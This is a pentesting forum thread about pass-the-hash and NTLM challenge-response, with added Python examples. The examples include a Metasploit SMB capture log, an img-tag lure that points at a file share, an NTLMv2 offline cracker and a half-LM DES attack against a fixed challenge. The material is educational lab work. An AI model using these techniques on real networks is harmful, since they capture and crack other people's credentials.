EH-Net > Ethical Hacking Discussions and Related Certifications > Network Pen Testing > Pass-the-hash question
Topic: Pass-the-hash question (Read 11879 times)
d3l0n (Jr. Member, Posts: 59), November 12, 2009, 08:46:03 PM:
Is it possible to use a sniffed hash from a connection between a Windows XP station and a Windows 2003 domain controller in a pass-the-hash technique? Or is it possible only if one used a tool like the Pass-the-Hash Toolkit on the Windows XP station, or had it authenticate to a station that is running the Metasploit SMB module?
Thanks
BillV (Hero Member, Posts: 1892), Reply #1, November 13, 2009, 05:38:13 AM:
As long as you have a utility that will pass the hash, I'm pretty sure you can use the proper hash no matter where you got it from.
d3l0n (Jr. Member, Posts: 59), Reply #2, November 13, 2009, 04:24:21 PM:
Thank you BillV.
I tried the sniffed hash with Metasploit and smbshell, but it did not work. So I'm guessing it works only with the Pass-the-Hash Toolkit; I have to try it with this tool, though, before I conclude.
Here is my environment, if that can help.
I have one domain controller (named DC), one workstation connected to the domain (named W1) and one workstation that is in a workgroup (s1). I also have an Ubuntu box running Metasploit 3.3rc1 and Nessus 4.
I have Cain & Abel installed on s1 and use it to sniff connections between DC and W1 and also between W1 and s1. The hashes I sniffed I used in Metasploit and smbshell as mentioned before, but with no luck.
I tried running the SMB module in Metasploit and had s1 connect to it via a URL link with the image source set as \\ubuntu\image\trick.gif. But I did not capture anything when I opened the HTML page from s1.
Any idea? Did I do anything wrong?
Thanks in advance for the help.
d3l0n (Jr. Member, Posts: 59), Reply #3, November 13, 2009, 04:54:04 PM:
This is the capture I gathered using the SMB module from s1:
Code:
msf auxiliary(smb) > run
[*] Auxiliary module execution completed
[*] Server started.
msf auxiliary(smb) > [*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:e4c33d3f1f2ef7952138d27242654f7a010100000000000029a52bd3b164ca013e2d8eb406b3f0d400000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:3a453950d098e9b59f88eaa5628bee520101000000000000f9ea2fd3b164ca0112a09ea79a0a637900000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:95782ca14bd78a4c70be953811709d71010100000000000098bb33d3b164ca01ae0245df301f235500000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:8ea08aa689958a547540711096d14aee0101000000000000680138d3b164ca0190afd31a5d8b575a00000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:aec3bb6e5d2f6f12bd83c0ef46a9e139010100000000000069bc3cd3b164ca015948d33cd527cce100000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:1ded841a3d184703ef5b115de99d8b3001010000000000004a2941d3b164ca0153d0e59769fe94de00000000020000000000000000000000 OS: LM:
[*] Captured 10.10.20.133:6252 victim LMHASH:000000000000000000000000000000000000000000000000 NTHASH:e8b28d52e979c73f8ef6e8d6dd00ec120101000000000000094845d3b164ca016abaf5dd251d583700000000020000000000000000000000 OS: LM:
You can see that for the same session (loading one page once) I gathered multiple NTLM hash values, and these values need "some processing" before getting the real NTLM hash.
timmedin (Sr. Member, Posts: 469), Reply #4, November 15, 2009, 11:18:38 AM:
I believe you are talking about three different scenarios, and each works differently.
1. Sniffing - When sniffing the authentication between two machines there is a "challenge" value used. If you don't know this value you won't be able to use the hash.
2. MSF SMB - This uses a static hash on the client (the Metasploit box) so the hash can be retrieved. MSF handles this for you, and you can use these hashes in the pass-the-hash attack.
3. Dump - These hashes can be used for pass the hash.
So that explains why your sniffing didn't work.
I don't know why your \\ubuntu\blah\blah didn't work. If you "ping ubuntu" from the other machine, does it work? My assumption is that it can't resolve "ubuntu" and fails before it even tries to connect.
twitter.com/timmedin | http://blog.securitywhole.com
d3l0n (Jr. Member, Posts: 59), Reply #5, November 16, 2009, 12:38:41 PM:
Thanks so much, timmedin, for the detailed explanation.
In my previous post, I posted a capture I gathered from the msf smb module. What I did to the HTML page to make it work is that I changed the img URL to this: <img src="file://ubuntu/blah/blah.img" >
But as you can see from the capture, LM is not used at all. The NTLM hash is much longer than usual. I'm not sure if there are further tweaks that need to be done to the hash to make it usable, or if it can't be used at all.
Any idea?
thx
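The capture and the three scenarios above, as an added example that is not part of the thread (nor code from Metasploit): the long NTHASH value the module prints is an NTLMv2 response, a 16-byte HMAC-MD5 proof followed by the client's blob (timestamp, 8-byte client nonce, target info), which is why it is much longer than a 16-byte NT hash and why no pass-the-hash tool can replay it. The block parses the first captured line, then recomputes the same exchange for a constructed victim (user alice, domain LAB, password Winter2009, all assumed) to show that each guess has to be recomputed against that session's blob, that changing only the client nonce changes the proof, and that the NT hash itself never appears on the wire. 1122334455667788 is the Metasploit SMB capture module's default fixed challenge; that the posted capture used it is assumed. MD4 is implemented inline (the NT hash is MD4 of the UTF-16LE password) so only the standard library is needed.

```python
import hmac
import hashlib
import struct
from datetime import datetime, timedelta, timezone


def _rot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(msg: bytes) -> bytes:
    """RFC 1320 MD4, implemented inline because many OpenSSL builds no longer expose it."""
    bitlen = len(msg) * 8
    msg = msg + b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", bitlen)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1: F = (b & c) | (~b & d)
            a, b, c, d = d, _rot((a + ((b & c) | (~b & d)) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2: G = majority(b, c, d)
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, _rot((a + ((b & c) | (b & d) | (c & d)) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3: H = b ^ c ^ d
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, _rot((a + (b ^ c ^ d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4]), b, c
        h = [(x + y) & 0xFFFFFFFF for x, y in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 of the UTF-16LE password. This 16-byte value is what pass-the-hash replays."""
    return md4(password.encode("utf-16-le"))


def ntlmv2_key(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain, UTF-16LE."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def make_blob(filetime: int, client_challenge: bytes, av_pairs: bytes = b"\x00" * 4) -> bytes:
    """NTLMv2 blob: 0x0101 signature, reserved, FILETIME, 8-byte client nonce, reserved, AV pairs, pad."""
    return struct.pack("<IIQ8sI", 0x00000101, 0, filetime, client_challenge, 0) + av_pairs + b"\x00" * 4


def ntlmv2_response(key: bytes, server_challenge: bytes, blob: bytes) -> bytes:
    """What goes on the wire: NTProofStr = HMAC-MD5(key, server_challenge || blob), followed by the blob."""
    return hmac.new(key, server_challenge + blob, hashlib.md5).digest() + blob


def parse_ntlmv2_response(hexstr: str) -> dict:
    """Split the module's NTHASH field into the 16-byte proof and the blob's fixed fields."""
    raw = bytes.fromhex(hexstr)
    proof, blob = raw[:16], raw[16:]
    sig, _, filetime, client_challenge, _ = struct.unpack("<IIQ8sI", blob[:28])
    if sig != 0x00000101:
        raise ValueError("not an NTLMv2 blob")
    when = datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=filetime // 10)
    return {"proof": proof, "blob": blob, "filetime": filetime,
            "client_challenge": client_challenge, "timestamp": when}


def crack_ntlmv2(captured_hex: str, server_challenge: bytes, user: str, domain: str, wordlist):
    """Offline guessing against one capture. Every guess is recomputed against this session's
    blob, so even a fixed server challenge gives the attacker no table to precompute."""
    cap = parse_ntlmv2_response(captured_hex)
    for pw in wordlist:
        guess = ntlmv2_response(ntlmv2_key(pw, user, domain), server_challenge, cap["blob"])
        if hmac.compare_digest(guess[:16], cap["proof"]):
            return pw
    return None


# First line of the capture posted above; the server side was the Metasploit module.
CAPTURED = ("e4c33d3f1f2ef7952138d27242654f7a0101000000000000"
            "29a52bd3b164ca013e2d8eb406b3f0d400000000020000000000000000000000")
MSF_STATIC_CHALLENGE = bytes.fromhex("1122334455667788")  # the module's default fixed challenge (assumed for the capture)


def demo() -> dict:
    cap = parse_ntlmv2_response(CAPTURED)
    # Constructed victim (assumed names, not from the thread) answering the same static challenge.
    key = ntlmv2_key("Winter2009", "alice", "LAB")
    session1 = ntlmv2_response(key, MSF_STATIC_CHALLENGE, cap["blob"])
    # A second session from the same user where only the 8-byte client nonce differs.
    session2 = ntlmv2_response(key, MSF_STATIC_CHALLENGE, make_blob(cap["filetime"], b"\x00" * 8, cap["blob"][28:-4]))
    recovered = crack_ntlmv2(session1.hex(), MSF_STATIC_CHALLENGE, "alice", "LAB",
                             ["password", "Summer2009", "Winter2009"])
    return {"capture_time": cap["timestamp"], "client_nonce": cap["client_challenge"].hex(),
            "recovered": recovered,
            "proof_changes_with_client_nonce": session1[:16] != session2[:16],
            "nt_hash_on_wire": nt_hash("Winter2009") in session1}


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Run directly, it prints the parsed timestamp and client nonce of the posted capture and the result of the offline guess against the constructed session; with a real capture the user and domain come from the NTLM AUTHENTICATE message and the challenge is whatever the capture module was configured with.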
d3l0n (Jr. Member, Posts: 59), Reply #6, November 24, 2009, 01:40:14 AM:
Quote
1. Sniffing - When sniffing the authentication between two machines there is a "challenge" value used. If you don't know this value you won't be able to use the hash.
How hard/easy is it for an attacker to guess/crack the challenge? What if both the workstation and the server only support NTLM, or only NTLMv2?
Thanks
timmedin (Sr. Member, Posts: 469), Reply #7, November 28, 2009, 11:27:09 PM:
Did you try using Cain & Abel or Ophcrack to crack it? Since you have the password hash that is "encrypted" with the challenge, you can't use it in a pass-the-hash attack. You need just the password hash to use it in the pass-the-hash attack.
timmedin (Sr. Member, Posts: 469), Reply #8, November 28, 2009, 11:29:13 PM:
Here is the blog post from metasploit.com on the subject: http://blog.metasploit.com/2008/11/ms08-067-metasploit-and-smb-relay.html
d3l0n (Jr. Member, Posts: 59), Reply #9, November 30, 2009, 12:03:45 AM:
Thanks much, timmedin. Incidentally, I was reading the post you kindly provided a link to.
This is my understanding of the subject. Cracking a sniffed challenge-response hash to get the password hash is not an easy task (time-wise) when the challenge key is not known. If the challenge key is known, the process will be much easier. This is if LM/NTLM challenge-response is sniffed; if NTLMv2 is sniffed, however, it will be extremely hard to do.
Thanks a lot, timmedin, for all your help in this post.
Last Edit: November 30, 2009, 12:05:42 AM by d3l0n
apollo (Full Member, Posts: 146), Reply #10, November 30, 2009, 12:18:09 AM:
If you get bored, I have some stuff on capturing challenge hashes and having fun with them in my presentation at http://www.sector.ca/presentations.htm.

Basically, if you have a static challenge for NTLMv1 auth, then you haven't really increased the complexity of cracking the password by very much. The reason for this is that for NTLMv1 only the server sets a challenge. In NTLMv2 both the client and the server have set a challenge, and so it makes it almost impossible to use any sort of time-memory tradeoff method such as rainbow tables to crack the password. You are left with brute force. The two challenges don't increase the complexity significantly over having a single random challenge, but it does mean that having control over one of the challenges will not help you much.

Turning off LM also increases the complexity of cracking NTLMv1 challenge/response, as you are left having to crack a whole hash. With the LM portion of NTLMv1 you can perform an attack known as a half-LM challenge attack, which will get you the first 8 characters of the password a lot faster, and then allow you to only brute force the last X characters of the password. If the password is < 11 characters, the time isn't significant. Passwords over 11 characters still require a fair amount of time, and it goes up exponentially as you add characters.

Anyway, hope this helps some.
-Ryan
CISSP, CSSLP, MCSE+Security, MCTS, CCSP, GPEN, GWAPT, GCWN, NOP, OSCP, Security+
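The static-challenge and half-LM points above, as an added example that is not part of the thread (nor code from Cain & Abel, Ophcrack or Metasploit): the LM response is the 8-byte server challenge DES-encrypted three times, keyed with consecutive 7-byte slices of the 16-byte LM hash padded to 21 bytes (NTLMv1 is the same construction over the NT hash). The first response block therefore depends only on the first 7 bytes of the LM hash, which in turn depend only on the first seven password characters, so against a fixed challenge an attacker builds a prefix table once from a wordlist and reuses it across every capture, then brute-forces the remaining characters at two DES operations per guess; against a per-session random challenge the same table misses. DES is implemented inline from the FIPS 46-3 tables so only the standard library is needed. 1122334455667788 is the Metasploit capture module's default challenge; the wordlist, the victim password Summer09, the digit-only tail charset and the second challenge are constructed for the demo. LM is case-insensitive, so the recovered password comes back uppercased.

```python
import itertools
import string

# FIPS 46-3 DES tables, 1-based bit positions as printed in the standard.
_IP = (58, 50, 42, 34, 26, 18, 10, 2, 60, 52, 44, 36, 28, 20, 12, 4, 62, 54, 46, 38, 30, 22, 14, 6, 64, 56, 48, 40, 32, 24, 16, 8,
       57, 49, 41, 33, 25, 17, 9, 1, 59, 51, 43, 35, 27, 19, 11, 3, 61, 53, 45, 37, 29, 21, 13, 5, 63, 55, 47, 39, 31, 23, 15, 7)
_FP = (40, 8, 48, 16, 56, 24, 64, 32, 39, 7, 47, 15, 55, 23, 63, 31, 38, 6, 46, 14, 54, 22, 62, 30, 37, 5, 45, 13, 53, 21, 61, 29,
       36, 4, 44, 12, 52, 20, 60, 28, 35, 3, 43, 11, 51, 19, 59, 27, 34, 2, 42, 10, 50, 18, 58, 26, 33, 1, 41, 9, 49, 17, 57, 25)
_E = (32, 1, 2, 3, 4, 5, 4, 5, 6, 7, 8, 9, 8, 9, 10, 11, 12, 13, 12, 13, 14, 15, 16, 17,
      16, 17, 18, 19, 20, 21, 20, 21, 22, 23, 24, 25, 24, 25, 26, 27, 28, 29, 28, 29, 30, 31, 32, 1)
_P = (16, 7, 20, 21, 29, 12, 28, 17, 1, 15, 23, 26, 5, 18, 31, 10, 2, 8, 24, 14, 32, 27, 3, 9, 19, 13, 30, 6, 22, 11, 4, 25)
_PC1 = (57, 49, 41, 33, 25, 17, 9, 1, 58, 50, 42, 34, 26, 18, 10, 2, 59, 51, 43, 35, 27, 19, 11, 3, 60, 52, 44, 36,
        63, 55, 47, 39, 31, 23, 15, 7, 62, 54, 46, 38, 30, 22, 14, 6, 61, 53, 45, 37, 29, 21, 13, 5, 28, 20, 12, 4)
_PC2 = (14, 17, 11, 24, 1, 5, 3, 28, 15, 6, 21, 10, 23, 19, 12, 4, 26, 8, 16, 7, 27, 20, 13, 2,
        41, 52, 31, 37, 47, 55, 30, 40, 51, 45, 33, 48, 44, 49, 39, 56, 34, 53, 46, 42, 50, 36, 29, 32)
_SHIFTS = (1, 1, 2, 2, 2, 2, 2, 2, 1, 2, 2, 2, 2, 2, 2, 1)
_S = (  # S1..S8, each as its 4 rows of 16 flattened
    (14, 4, 13, 1, 2, 15, 11, 8, 3, 10, 6, 12, 5, 9, 0, 7, 0, 15, 7, 4, 14, 2, 13, 1, 10, 6, 12, 11, 9, 5, 3, 8, 4, 1, 14, 8, 13, 6, 2, 11, 15, 12, 9, 7, 3, 10, 5, 0, 15, 12, 8, 2, 4, 9, 1, 7, 5, 11, 3, 14, 10, 0, 6, 13),
    (15, 1, 8, 14, 6, 11, 3, 4, 9, 7, 2, 13, 12, 0, 5, 10, 3, 13, 4, 7, 15, 2, 8, 14, 12, 0, 1, 10, 6, 9, 11, 5, 0, 14, 7, 11, 10, 4, 13, 1, 5, 8, 12, 6, 9, 3, 2, 15, 13, 8, 10, 1, 3, 15, 4, 2, 11, 6, 7, 12, 0, 5, 14, 9),
    (10, 0, 9, 14, 6, 3, 15, 5, 1, 13, 12, 7, 11, 4, 2, 8, 13, 7, 0, 9, 3, 4, 6, 10, 2, 8, 5, 14, 12, 11, 15, 1, 13, 6, 4, 9, 8, 15, 3, 0, 11, 1, 2, 12, 5, 10, 14, 7, 1, 10, 13, 0, 6, 9, 8, 7, 4, 15, 14, 3, 11, 5, 2, 12),
    (7, 13, 14, 3, 0, 6, 9, 10, 1, 2, 8, 5, 11, 12, 4, 15, 13, 8, 11, 5, 6, 15, 0, 3, 4, 7, 2, 12, 1, 10, 14, 9, 10, 6, 9, 0, 12, 11, 7, 13, 15, 1, 3, 14, 5, 2, 8, 4, 3, 15, 0, 6, 10, 1, 13, 8, 9, 4, 5, 11, 12, 7, 2, 14),
    (2, 12, 4, 1, 7, 10, 11, 6, 8, 5, 3, 15, 13, 0, 14, 9, 14, 11, 2, 12, 4, 7, 13, 1, 5, 0, 15, 10, 3, 9, 8, 6, 4, 2, 1, 11, 10, 13, 7, 8, 15, 9, 12, 5, 6, 3, 0, 14, 11, 8, 12, 7, 1, 14, 2, 13, 6, 15, 0, 9, 10, 4, 5, 3),
    (12, 1, 10, 15, 9, 2, 6, 8, 0, 13, 3, 4, 14, 7, 5, 11, 10, 15, 4, 2, 7, 12, 9, 5, 6, 1, 13, 14, 0, 11, 3, 8, 9, 14, 15, 5, 2, 8, 12, 3, 7, 0, 4, 10, 1, 13, 11, 6, 4, 3, 2, 12, 9, 5, 15, 10, 11, 14, 1, 7, 6, 0, 8, 13),
    (4, 11, 2, 14, 15, 0, 8, 13, 3, 12, 9, 7, 5, 10, 6, 1, 13, 0, 11, 7, 4, 9, 1, 10, 14, 3, 5, 12, 2, 15, 8, 6, 1, 4, 11, 13, 12, 3, 7, 14, 10, 15, 6, 8, 0, 5, 9, 2, 6, 11, 13, 8, 1, 4, 10, 7, 9, 5, 0, 15, 14, 2, 3, 12),
    (13, 2, 8, 4, 6, 15, 11, 1, 10, 9, 3, 14, 5, 0, 12, 7, 1, 15, 13, 8, 10, 3, 7, 4, 12, 5, 6, 11, 0, 14, 9, 2, 7, 11, 4, 1, 9, 12, 14, 2, 0, 6, 10, 13, 15, 3, 5, 8, 2, 1, 14, 7, 4, 10, 8, 13, 15, 12, 9, 0, 3, 5, 6, 11),
)


def _bits(data):  # bytes -> list of bits, MSB first
    return [(byte >> (7 - i)) & 1 for byte in data for i in range(8)]

def _unbits(bits):
    return bytes(sum(bit << (7 - i) for i, bit in enumerate(bits[j:j + 8])) for j in range(0, len(bits), 8))

def _perm(bits, table):
    return [bits[i - 1] for i in table]

def _expand_key(key7):
    """Spread 56 key bits over 8 bytes, 7 bits each; DES ignores the low (parity) bit of every byte."""
    n = int.from_bytes(key7, "big")
    return bytes(((n >> (49 - 7 * i)) & 0x7F) << 1 for i in range(8))

def des_encrypt_block(key8, block8):
    """Single-block DES encryption: key schedule, IP, 16 Feistel rounds, swap, FP."""
    k = _perm(_bits(key8), _PC1)
    c, d, subkeys = k[:28], k[28:], []
    for s in _SHIFTS:
        c, d = c[s:] + c[:s], d[s:] + d[:s]
        subkeys.append(_perm(c + d, _PC2))
    bits = _perm(_bits(block8), _IP)
    l, r = bits[:32], bits[32:]
    for sk in subkeys:
        x = [a ^ b for a, b in zip(_perm(r, _E), sk)]
        f = []
        for i in range(8):
            c6 = x[6 * i:6 * i + 6]
            v = _S[i][(c6[0] * 2 + c6[5]) * 16 + (c6[1] * 8 + c6[2] * 4 + c6[3] * 2 + c6[4])]
            f += [(v >> 3) & 1, (v >> 2) & 1, (v >> 1) & 1, v & 1]
        l, r = r, [a ^ b for a, b in zip(l, _perm(f, _P))]
    return _unbits(_perm(r + l, _FP))

def lm_hash(password):
    """LM hash: uppercase, pad to 14, and DES-encrypt the constant KGS!@#$% with each 7-byte half as key."""
    pw = password.upper().encode("ascii", "replace")[:14].ljust(14, b"\x00")
    return b"".join(des_encrypt_block(_expand_key(pw[i:i + 7]), b"KGS!@#$%") for i in (0, 7))

def lm_response(lmhash, challenge):
    """LM (and, with the NT hash, NTLMv1) response: hash || 5 zero bytes -> three 7-byte keys, each encrypting the challenge."""
    keys = lmhash + b"\x00" * 5
    return b"".join(des_encrypt_block(_expand_key(keys[i:i + 7]), challenge) for i in (0, 7, 14))

def build_half_lm_table(challenge, words):
    """Precompute the first response block for each word's 7-char prefix; only worthwhile if the challenge is fixed."""
    return {des_encrypt_block(_expand_key(lm_hash(w)[:7]), challenge): w[:7].upper() for w in words}

def crack_rest(first7, response, challenge, charset, max_tail):
    """Brute-force characters 8..14 given the recovered prefix: one DES for the second LM-hash half, one for the second block."""
    first_half = lm_hash(first7)[:8]
    for n in range(max_tail + 1):
        for tail in itertools.product(charset.upper(), repeat=n):
            t = "".join(tail)
            second_half = des_encrypt_block(_expand_key(t.encode().ljust(7, b"\x00")), b"KGS!@#$%")
            if des_encrypt_block(_expand_key(first_half[7:8] + second_half[:6]), challenge) == response[8:16]:
                return first7 + t
    return None

STATIC_CHALLENGE = bytes.fromhex("1122334455667788")  # Metasploit's default fixed challenge

def demo():
    # Constructed wordlist; the table is built once for the fixed challenge and reused for every capture.
    table = build_half_lm_table(STATIC_CHALLENGE, ["password", "welcome1", "summer09", "winter2009", "letmein"])
    victim = lm_response(lm_hash("Summer09"), STATIC_CHALLENGE)  # constructed victim's LM response
    prefix = table.get(victim[:8])
    full = crack_rest(prefix, victim, STATIC_CHALLENGE, string.digits, 2) if prefix else None
    # Same victim and password under a per-session random challenge: the precomputed table misses.
    other = lm_response(lm_hash("Summer09"), bytes.fromhex("8877665544332211"))
    return {"prefix": prefix, "password": full, "table_hit_with_random_challenge": table.get(other[:8])}
```

demo() returns the recovered prefix, the full (uppercased) password and the empty lookup under the random challenge; a real half-LM rainbow table just replaces the small dictionary with a precomputed table over every 7-character prefix, which is exactly what a fixed challenge makes possible and a random one defeats.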
d3l0n (Jr. Member, Posts: 59), Reply #11, December 02, 2009, 12:34:59 PM:
Very informative Ryan, thank you so much!
© 2013 The Ethical Hacker Network